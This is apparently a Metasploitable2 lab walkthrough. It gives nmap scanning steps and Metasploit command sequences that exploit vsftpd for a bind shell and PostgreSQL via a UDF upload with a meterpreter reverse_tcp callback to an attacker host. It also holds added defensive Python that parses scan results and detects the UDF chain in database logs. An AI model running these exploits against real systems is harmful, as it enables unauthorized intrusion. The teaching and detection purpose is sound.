Metasploitable 2

Start Metasploitable2

If you haven't set up Metasploitable2 yet, you can follow my steps in the chapter Docker basics and Images.

docker ps -a

docker start meta2

docker ps

docker exec -it meta2 /bin/bash

hostname -i

nmap vulnerability scan

sudo nmap -T5 -Pn -n -v -sS -sV --script "vuln OR default" --open -oA ./vulscan_nmap_meta2 172.17.0.2

Wait until the scan is finished, then convert the XML report into an HTML report:

xsltproc vulscan_nmap_meta2.xml -o vulscan_nmap_meta2.html
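The -oA option above writes the scan results in three formats at once, and the XML file is the one xsltproc turns into HTML. As an added example (not part of the original page), the Python below reads that same XML programmatically: it lists every open port with the detected product and version, and flags ports where a vuln-category NSE script reported the "VULNERABLE" marker in its output. The embedded document is a constructed sample in the layout nmap emits, not a real scan of the lab; the script ids, versions and script output in it are placeholders, and the function names are this example's own. For a real run, pass the file contents: parse_open_services(open("vulscan_nmap_meta2.xml").read()).

```python
import xml.etree.ElementTree as ET

# Constructed sample in the shape of nmap -oX / -oA output (not a real scan of the
# lab). Versions, script ids and script output are placeholders for the example.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -sV --script vuln 172.17.0.2" version="7.94" xmloutputversion="1.05">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="172.17.0.2" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open" reason="syn-ack"/>
        <service name="ftp" product="vsftpd" version="X.Y.Z" method="probed" conf="10"/>
        <script id="ftp-example-vuln-check" output="&#10;  VULNERABLE:&#10;  constructed finding for the sample"/>
      </port>
      <port protocol="tcp" portid="22">
        <state state="closed" reason="reset"/>
        <service name="ssh" method="table" conf="3"/>
      </port>
      <port protocol="tcp" portid="5432">
        <state state="open" reason="syn-ack"/>
        <service name="postgresql" product="PostgreSQL DB" version="X.Y" method="probed" conf="10"/>
        <script id="example-benign-script" output="nothing interesting"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def parse_open_services(xml_text):
    """Return one dict per open port: host, port, proto, service, product, version
    and the ids of port scripts whose output carries the NSE 'VULNERABLE' marker.
    Only scripts attached to a <port> are inspected, not <hostscript> entries."""
    root = ET.fromstring(xml_text)
    services = []
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # --open already filters these, but other scans will not
            svc = port.find("service")
            svc_attr = (lambda k: svc.get(k)) if svc is not None else (lambda k: None)
            vuln_scripts = [
                s.get("id")
                for s in port.findall("script")
                if "VULNERABLE" in (s.get("output") or "")
            ]
            services.append({
                "host": addr,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": svc_attr("name"),
                "product": svc_attr("product"),
                "version": svc_attr("version"),
                "vuln_scripts": vuln_scripts,
            })
    return services


def flagged(services):
    """Only the open ports where at least one vuln script fired."""
    return [s for s in services if s["vuln_scripts"]]


def report_lines(services):
    """One human-readable line per open port; '!!' marks ports with vuln findings."""
    lines = []
    for s in services:
        tag = " !! " + ",".join(s["vuln_scripts"]) if s["vuln_scripts"] else ""
        lines.append(
            f"{s['host']}:{s['port']}/{s['proto']} {s['service']} "
            f"{s['product'] or ''} {s['version'] or ''}".rstrip() + tag
        )
    return lines


if __name__ == "__main__":
    found = parse_open_services(SAMPLE_NMAP_XML)
    print("\n".join(report_lines(found)))
    print(f"{len(flagged(found))} of {len(found)} open ports have vuln findings")
```

The list this produces is the same information the HTML report shows, but as data you can diff between scans, which is how a defender tracks whether a finding on the lab host (or a real one) has actually been remediated.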

Exploit vsftpd service

searchsploit vsftpd

msfconsole

search vsftpd

use 0

set rhost 172.17.0.2

exploit

We now have a bind shell on the target.

Exploit PostgreSQL

From the vulnerability report we can see that a PostgreSQL service is running on the target system.

Let's enumerate the PostgreSQL version of our target:

use auxiliary/scanner/postgres/postgres_version

set rhosts 172.17.0.2

exploit

search postgres

use 13

info

Description: On some default Linux installations of PostgreSQL, the postgres service account may write to the /tmp directory, and may source UDF Shared Libraries from there as well, allowing execution of arbitrary code. This module compiles a Linux shared object file, uploads it to the target host via the UPDATE pg_largeobject method of binary injection, and creates a UDF (user defined function) from that shared object. Because the payload is run as the shared object's constructor, it does not need to conform to specific Postgres API versions.

set lhost 172.17.0.1

set rhost 172.17.0.2

(We keep the default payload, linux/x86/meterpreter/reverse_tcp.)

exploit -j

sessions

sessions -i 3
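The module description above names three steps that are visible on the database side: a direct UPDATE of pg_largeobject, the shared object being written to /tmp, and a C-language function being created from that file. As an added example (not part of the original page or of the Metasploit module), the Python below runs one detection rule per step over a constructed PostgreSQL server log excerpt and raises a single alert when the same backend process performs all three. It assumes log_statement is set to 'all' (with 'ddl' only the CREATE FUNCTION line would be logged) and log_line_prefix = '%t [%p] %u@%d '; the log lines, pids, role names and the path /tmp/udf.so are constructed, and the rule names are this example's own.

```python
import re
from collections import defaultdict

# Constructed PostgreSQL server log excerpt (not from the original page). The
# line layout assumes log_line_prefix = '%t [%p] %u@%d ' and log_statement = 'all';
# adjust LINE_RE if your prefix differs. The hex payload is elided on purpose.
SAMPLE_PG_LOG = """\
2024-01-01 10:00:01 UTC [2231] postgres@template1 LOG:  statement: SELECT version()
2024-01-01 10:00:02 UTC [2231] postgres@template1 LOG:  statement: UPDATE pg_largeobject SET data = decode('<hex elided>', 'hex') WHERE loid = 16421 AND pageno = 0
2024-01-01 10:00:03 UTC [2231] postgres@template1 LOG:  statement: SELECT lo_export(16421, '/tmp/udf.so')
2024-01-01 10:00:03 UTC [2231] postgres@template1 LOG:  statement: CREATE OR REPLACE FUNCTION pg_temp.run(text) RETURNS int AS '/tmp/udf.so', 'run' LANGUAGE 'C' STRICT
2024-01-01 10:05:00 UTC [2240] app@shop LOG:  statement: SELECT * FROM orders WHERE id = 42
"""

# Splits a statement line into timestamp, backend pid, role, database and SQL text.
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) "
    r"LOG:\s+statement: (?P<stmt>.*)$"
)

# (rule name, pattern). A capture group, where present, holds the file path involved.
# Normal clients never UPDATE pg_largeobject directly; they go through lo_* functions.
RULES = [
    ("pg_largeobject_direct_write",
     re.compile(r"\bUPDATE\s+pg_largeobject\b", re.I)),
    ("lo_export_to_tmp",
     re.compile(r"\blo_export\s*\([^)]*'(/tmp/[^']*)'", re.I)),
    ("c_udf_from_tmp",
     re.compile(r"\bCREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\b.*\bAS\s+'(/tmp/[^']*)'.*\bLANGUAGE\s+'?C\b", re.I)),
]


def detect(log_text):
    """Return one finding per (line, rule) hit: line number, pid, role, db, rule, path."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # not a statement line, or a prefix this parser does not know
        stmt = m.group("stmt")
        for name, pat in RULES:
            hit = pat.search(stmt)
            if hit:
                findings.append({
                    "line": n, "pid": m.group("pid"), "user": m.group("user"),
                    "db": m.group("db"), "rule": name,
                    "path": hit.group(1) if hit.groups() else None,
                })
    return findings


def correlate(findings):
    """Backend pids that triggered every rule, i.e. wrote a library through the
    large-object tables, dropped it in /tmp and loaded it as a C function."""
    rules_by_pid = defaultdict(set)
    for f in findings:
        rules_by_pid[f["pid"]].add(f["rule"])
    required = {name for name, _ in RULES}
    return sorted(pid for pid, rules in rules_by_pid.items() if required <= rules)


if __name__ == "__main__":
    hits = detect(SAMPLE_PG_LOG)
    for f in hits:
        print(f"line {f['line']}: pid {f['pid']} {f['user']}@{f['db']} {f['rule']} {f['path'] or ''}")
    for pid in correlate(hits):
        print(f"ALERT: pid {pid} completed the full UDF code-execution chain")
```

Any single rule on its own is worth a look, but the per-pid correlation is what separates this chain from legitimate large-object use. Each step also needs superuser rights on the database, so the underlying weakness the lab demonstrates is a superuser role reachable over the network with a default password; restricting who may connect as that role in pg_hba.conf and giving it a strong password removes the precondition rather than just the symptom.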
